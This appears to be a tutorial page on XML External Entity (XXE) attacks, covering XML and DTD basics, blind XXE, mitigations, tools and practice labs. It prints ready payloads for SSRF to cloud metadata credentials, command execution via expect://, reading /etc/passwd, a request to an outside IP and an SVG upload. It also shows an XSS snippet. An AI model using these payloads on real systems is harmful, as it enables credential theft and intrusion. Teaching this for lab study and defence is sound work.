EXternal Xml Entity (XXE)
External XML Entity (XXE)
π What Is XXE ?
π€ Why XXE Happen ?
𧬠XXE Types
β Impact
π How To Find
π Tools
π Referance
π¬ Labs
π What Is XXE?
What is XML?
XML stands for βExtensible Markup Languageβ, It is the most common language for storing and transporting data. It is a self-descriptive language. It does not contain any predefined tags like <p>, <img>, etc. All the tags are user-defined depending upon the data it is representing for example. <email></email>, <message></message> etc.
You can know more about XML Entities FROM HERE To avoid wasting time.
Definition of XXE:
An XML External Entity attack is a type of attack against an application that parses XML input and allows XML entities. XML entities can be used to tell the XML parser to fetch specific content on the server.
What is the Document Type Definition (DTD)?
It describes the structure of the document which contains elements and attributes declarations. The element declaration contains the allowable set of elements that will be used within the document. The attribute declaration contains the allowable set of attributes corresponding to each element.
Syntax: -
<!DOCTYPE element DTD identifier
[
declaration1
declaration2
........
]>
π€ Why XXE Happen?
Some applications use the XML format to transmit data between the browser and the server. Applications that do this virtually always use a standard library or platform API to process the XML data on the server. XXE vulnerabilities arise because the XML specification contains various potentially dangerous features, and standard parsers support these features even if they are not normally used by the application.
𧬠XXE Types
Basic XXE
Blind XXE
Blind XXE
Blind XXE vulnerabilities arise where the application is vulnerable to XXE injection but does not return the values of any defined external entities within its responses. This means that direct retrieval of server-side files is not possible, and so blind XXE is generally harder to exploit than regular XXE vulnerabilities.
There are two broad ways in which you can find and exploit blind XXE vulnerabilities:
You can trigger out-of-band network interactions, sometimes exfiltrating sensitive data within the interaction data. You can trigger XML parsing errors in such a way that the error messages contain sensitive data.
β Impact
XML External Entity (XXE) can possess a severe threat to a company or a web developer. XXE has always been in the Top 10 list of OWASP. It is common for lots of websites to use XML in the string and transportation of data and if countermeasures are not taken then this information will be compromised. Various attacks that are possible are:
Server-Side Request Forgery (SSRF)
<?xml version=β1.0β encoding=βUTF-8β?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM βhttp://169.254.169.254/latest/meta-data/iam/security-credentials/adminβ> ]>
<stockCheck><productId>&xxe;</productId></stockCheck>Remote Code Execution (RCE)
<?xml version=β1.0β encoding=βISO-8859-1β?>
<!DOCTYPE foo [<!ELEMENT foo ANY > <!ENTITY xxe SYSTEM βexpect://idβ >]>
<stockCheck><productId>&xxe;</productId></stockCheck>
Read Files
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck><productId>&xxe;</productId></stockCheck>Cross-Site Scripting (XSS)
<![CDATA[<]]>script<![CDATA[>]]>alert(1)<![CDATA[<]]>/script<![CDATA[>]]>Content-Type: From JSON to XEE To change the request you could use a Burp Extension named Content Type Converter.
Here you can find this example:
Content-Type: application/json;charset=UTF-8
{"root": {"root": {
"firstName": "Avinash",
"lastName": "",
"country": "United States",
"city": "ddd",
"postalCode": "ddd"
}}}Content-Type: application/xml;charset=UTF-8
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE testingxxe [<!ENTITY xxe SYSTEM "http://34.229.92.127:8000/TEST.ext" >]>
<root>
<root>
<firstName>&xxe;</firstName>
<lastName/>
<country>United States</country>
<city>ddd</city>
<postalCode>ddd</postalCode>
</root>
</root>File Upload
XXE can be performed using the file upload method. We will be demonstrating this using Port Swigger lab βExploiting XXE via Image Uploadβ. The payload that we will be using is:
<?XML version="1.0" standalone="yes"?>
<!DOCTYPE reset [
<!ENTITY xxe SYSTEM "file:///etc/hostname"> ] >
<svg width="500px" height="500px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<text font-size="40" x="0" y="100">
&xxe;
</text>
</svg>Understanding the payload: We will make an SVG file as only the upload area accepts only image files. The basic syntax of the SVG file is given above and in that, we have added a text field that will
We will be saving the above code as βpayload.svgβ. Now on portswigger, we will go on a post and comment and then add the made payload in the avatar field.
π How To Find
Detect any XML data parsing or JSON and try to inject XXE
β Mitigation
The best way to avoid XXE vulnerabilities is to
Altogether disable document type definitions (DTDs) in your XML parser.
If this is impossible, you must disable external entities and document type declarations for your parser.
disable support for
XInclude
π Tools
xxeftp: - A mini webserver with FTP support for XXE payloads
xxexploiter: - Tool to help exploit XXE vulnerabilities
230-OOB: - An Out-of-Band XXE server for retrieving file contents over FTP and payload generation via http://xxe.sh/
XXEinjector: - Tool for automatic exploitation of XXE vulnerability using direct and different out of band methods
oxml_xxe: - A tool for embedding XXE/XML exploits into different filetypes (DOCX/XLSX/PPTX, ODT/ODG/ODP/ODS, SVG, XML, PDF, JPG, GIF)
docem: - Utility to embed XXE and XSS payloads in docx,odt,pptx,etc
otori: - Toolbox intended to allow useful exploitation of XXE vulnerabilities.
π Reference
π¬ Labs
Portswigger Portswigger Labs Solution is Here
OWASP Broken Web Applications Project: Install this Machine and will have a lot of Labs like DVWA, BWAPP, Webgoat, etc
Last updated